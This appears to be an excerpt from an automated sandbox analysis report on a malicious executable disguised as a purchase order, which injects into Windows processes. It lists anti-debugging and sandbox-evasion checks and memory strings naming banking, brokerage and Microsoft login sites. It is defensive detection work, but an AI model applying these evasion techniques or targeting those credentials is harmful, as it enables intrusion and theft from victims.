            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_00AB7795 push ecx; ret 0_2_00AB77A8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004019A7 push es; retf 2_2_00401A2B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00406005 push ds; ret 2_2_00406010
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00408818 push edi; ret 2_2_004088A4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401A29 push es; retf 2_2_00401A2B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00414CD3 push edi; iretd 2_2_00414CE1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004144AE push ebx; iretd 2_2_004144AF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401566 push esi; iretd 2_2_004015F7
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401522 push esi; iretd 2_2_004015F7
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004145E3 push edx; ret 2_2_00414605
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040159A push esi; iretd 2_2_004015F7
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00406FD7 push cs; ret 2_2_00406FD8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00407784 push esi; iretd 2_2_0040779A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041EF85 pushad ; ret 2_2_0041EF4B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040AF8E push ebp; retf 2_2_0040AFA2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004037A0 push eax; ret 2_2_004037A2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B0225F pushad ; ret 2_2_03B027F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B027FA pushad ; ret 2_2_03B027F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B309AD push ecx; mov dword ptr [esp], ecx 2_2_03B309B6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B0283D push eax; iretd 2_2_03B02858
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_02CF09AD push ecx; mov dword ptr [esp], ecx 4_2_02CF09B6
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_00125075 push edi; ret 4_2_00125101
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_0013152A push edi; iretd 4_2_0013153E
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_001277F4 push ebp; retf 4_2_001277FF
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_0013B7E2 pushad ; ret 4_2_0013B7A8
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_00123834 push cs; ret 4_2_00123835
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_0014482F pushad ; iretd 4_2_00144830
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_00122862 push ds; ret 4_2_0012286D
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_00123FE1 push esi; iretd 4_2_00123FF7
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_009451AE push eax; iretd 4_2_009451B4
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_0094628A push eax; retf 4_2_00946294
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_00AAF78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00AAF78E
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_00AF7F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00AF7F0E
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_00AB1E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00AB1E5A
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | API/Special instruction interceptor: Address: 13BD19C
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | API/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | API/Special instruction interceptor: Address: 7FF8C88ED7E4
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | API/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | API/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | API/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | API/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | API/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | API/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B7096E rdtsc 2_2_03B7096E
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Window / User API: threadDelayed 9839
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Evaded block: after key decision graph_0-109411
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | API coverage: 4.5 %
            Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | API coverage: 2.8 %
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 1628 | Thread sleep count: 135 > 30
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 1628 | Thread sleep time: -270000s >= -30000s
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 1628 | Thread sleep count: 9839 > 30
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe TID: 1628 | Thread sleep time: -19678000s >= -30000s
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe TID: 7056 | Thread sleep time: -65000s >= -30000s
            Source: C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe TID: 7056 | Thread sleep time: -37500s >= -30000s
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Last function: Thread delayed
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_00AADD92 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00AADD92
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_00AE2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00AE2044
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_00AE219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00AE219F
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_00AE24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00AE24A9
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_00AD6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 0_2_00AD6B3F
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_00AD6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, 0_2_00AD6E4A
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_00ADF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00ADF350
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_00ADFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_00ADFDD2
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_00ADFD47 FindFirstFileW,FindClose, 0_2_00ADFD47
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_0013C380 FindFirstFileW,FindNextFileW,FindClose, 4_2_0013C380
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_00AAE47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00AAE47B
            Source: 7466H3538.4.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: 7466H3538.4.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: 7466H3538.4.dr | Binary or memory string: discord.comVMware20,11696428655f
            Source: 7466H3538.4.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: 7466H3538.4.dr | Binary or memory string: global block list test formVMware20,11696428655
            Source: 7466H3538.4.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: RMActivate_ssp.exe, 00000004.00000002.3890715735.000000000755A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696428655-
            Source: 7466H3538.4.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: 7466H3538.4.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: 7466H3538.4.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: CjeBlighAyoJst.exe, 00000006.00000002.3887155831.000000000073F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll,
            Source: 7466H3538.4.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: 7466H3538.4.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: 7466H3538.4.dr | Binary or memory string: outlook.office365.comVMware20,11696428655t
            Source: 7466H3538.4.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: 7466H3538.4.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: 7466H3538.4.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: 7466H3538.4.dr | Binary or memory string: outlook.office.comVMware20,11696428655s
            Source: firefox.exe, 00000008.00000002.2594465096.000002815F4BC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll??
            Source: 7466H3538.4.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: 7466H3538.4.dr | Binary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: 7466H3538.4.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: 7466H3538.4.dr | Binary or memory string: AMC password management pageVMware20,11696428655
            Source: 7466H3538.4.dr | Binary or memory string: tasks.office.comVMware20,11696428655o
            Source: 7466H3538.4.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: 7466H3538.4.dr | Binary or memory string: interactivebrokers.comVMware20,11696428655
            Source: 7466H3538.4.dr | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: 7466H3538.4.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: 7466H3538.4.dr | Binary or memory string: dev.azure.comVMware20,11696428655j
            Source: 7466H3538.4.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: RMActivate_ssp.exe, 00000004.00000002.3886865804.0000000000582000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
            Source: 7466H3538.4.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: 7466H3538.4.dr | Binary or memory string: bankofamerica.comVMware20,11696428655x
            Source: 7466H3538.4.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: 7466H3538.4.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B7096E rdtsc 2_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00417A93 LdrLoadDll, 2_2_00417A93
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_00AE703C BlockInput, 0_2_00AE703C
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_00A9374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW, 0_2_00A9374E
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_00AC46D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW, 0_2_00AC46D0
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_00AF20F6 LoadLibraryA,GetProcAddress, 0_2_00AF20F6
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_013BD408 mov eax, dword ptr fs:[00000030h] 0_2_013BD408
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_013BD468 mov eax, dword ptr fs:[00000030h] 0_2_013BD468
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exe | Code function: 0_2_013BBE08 mov eax, dword ptr fs:[00000030h] 0_2_013BBE08
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B28397 mov eax, dword ptr fs:[00000030h] 2_2_03B28397
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2E388 mov eax, dword ptr fs:[00000030h] 2_2_03B2E388
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B5438F mov eax, dword ptr fs:[00000030h] 2_2_03B5438F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B4E3F0 mov eax, dword ptr fs:[00000030h] 2_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B663FF mov eax, dword ptr fs:[00000030h] 2_2_03B663FF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B403E9 mov eax, dword ptr fs:[00000030h] 2_2_03B403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDE3DB mov eax, dword ptr fs:[00000030h] 2_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BDE3DB mov ecx, dword ptr fs:[00000030h] 2_2_03BDE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BD43D4 mov eax, dword ptr fs:[00000030h] 2_2_03BD43D4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BEC3CD mov eax, dword ptr fs:[00000030h] 2_2_03BEC3CD
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_03B3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B383C0 mov eax, dword ptr fs:[00000030h] 2_2_03B383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB63C0 mov eax, dword ptr fs:[00000030h] 2_2_03BB63C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C0634F mov eax, dword ptr fs:[00000030h] 2_2_03C0634F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2C310 mov ecx, dword ptr fs:[00000030h] 2_2_03B2C310
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B50310 mov ecx, dword ptr fs:[00000030h] 2_2_03B50310
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6A30B mov eax, dword ptr fs:[00000030h] 2_2_03B6A30B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BD437C mov eax, dword ptr fs:[00000030h] 2_2_03BD437C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C08324 mov eax, dword ptr fs:[00000030h] 2_2_03C08324
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C08324 mov ecx, dword ptr fs:[00000030h] 2_2_03C08324
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB035C mov eax, dword ptr fs:[00000030h] 2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB035C mov ecx, dword ptr fs:[00000030h] 2_2_03BB035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BFA352 mov eax, dword ptr fs:[00000030h] 2_2_03BFA352
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BD8350 mov ecx, dword ptr fs:[00000030h] 2_2_03BD8350
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB2349 mov eax, dword ptr fs:[00000030h] 2_2_03BB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B402A0 mov eax, dword ptr fs:[00000030h] 2_2_03B402A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C062D6 mov eax, dword ptr fs:[00000030h] 2_2_03C062D6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC62A0 mov eax, dword ptr fs:[00000030h] 2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC62A0 mov ecx, dword ptr fs:[00000030h] 2_2_03BC62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6E284 mov eax, dword ptr fs:[00000030h] 2_2_03B6E284
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB0283 mov eax, dword ptr fs:[00000030h] 2_2_03BB0283
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B402E1 mov eax, dword ptr fs:[00000030h] 2_2_03B402E1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_03B3A2C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2823B mov eax, dword ptr fs:[00000030h] 2_2_03B2823B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C0625D mov eax, dword ptr fs:[00000030h] 2_2_03C0625D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BE0274 mov eax, dword ptr fs:[00000030h] 2_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B34260 mov eax, dword ptr fs:[00000030h] 2_2_03B34260
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2826B mov eax, dword ptr fs:[00000030h] 2_2_03B2826B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2A250 mov eax, dword ptr fs:[00000030h] 2_2_03B2A250
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B36259 mov eax, dword ptr fs:[00000030h] 2_2_03B36259
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BEA250 mov eax, dword ptr fs:[00000030h] 2_2_03BEA250
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB8243 mov eax, dword ptr fs:[00000030h] 2_2_03BB8243
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB8243 mov ecx, dword ptr fs:[00000030h] 2_2_03BB8243
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB019F mov eax, dword ptr fs:[00000030h] 2_2_03BB019F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B2A197 mov eax, dword ptr fs:[00000030h] 2_2_03B2A197
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C061E5 mov eax, dword ptr fs:[00000030h] 2_2_03C061E5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B70185 mov eax, dword ptr fs:[00000030h] 2_2_03B70185
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BEC188 mov eax, dword ptr fs:[00000030h] 2_2_03BEC188
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BD4180 mov eax, dword ptr fs:[00000030h] 2_2_03BD4180
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B601F8 mov eax, dword ptr fs:[00000030h] 2_2_03B601F8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h] 2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov ecx, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03BAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF61C3 mov eax, dword ptr fs:[00000030h]2_2_03BF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF61C3 mov eax, dword ptr fs:[00000030h]2_2_03BF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B60124 mov eax, dword ptr fs:[00000030h]2_2_03B60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04164 mov eax, dword ptr fs:[00000030h]2_2_03C04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04164 mov eax, dword ptr fs:[00000030h]2_2_03C04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov ecx, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA118 mov eax, dword ptr fs:[00000030h]2_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF0115 mov eax, dword ptr fs:[00000030h]2_2_03BF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov eax, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDE10E mov ecx, dword ptr fs:[00000030h]2_2_03BDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C156 mov eax, dword ptr fs:[00000030h]2_2_03B2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC8158 mov eax, dword ptr fs:[00000030h]2_2_03BC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36154 mov eax, dword ptr fs:[00000030h]2_2_03B36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36154 mov eax, dword ptr fs:[00000030h]2_2_03B36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov ecx, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC4144 mov eax, dword ptr fs:[00000030h]2_2_03BC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF60B8 mov eax, dword ptr fs:[00000030h]2_2_03BF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF60B8 mov ecx, dword ptr fs:[00000030h]2_2_03BF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B280A0 mov eax, dword ptr fs:[00000030h]2_2_03B280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC80A8 mov eax, dword ptr fs:[00000030h]2_2_03BC80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3208A mov eax, dword ptr fs:[00000030h]2_2_03B3208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C0F0 mov eax, dword ptr fs:[00000030h]2_2_03B2C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B720F0 mov ecx, dword ptr fs:[00000030h]2_2_03B720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A0E3 mov ecx, dword ptr fs:[00000030h]2_2_03B2A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B380E9 mov eax, dword ptr fs:[00000030h]2_2_03B380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB60E0 mov eax, dword ptr fs:[00000030h]2_2_03BB60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB20DE mov eax, dword ptr fs:[00000030h]2_2_03BB20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6030 mov eax, dword ptr fs:[00000030h]2_2_03BC6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2A020 mov eax, dword ptr fs:[00000030h]2_2_03B2A020
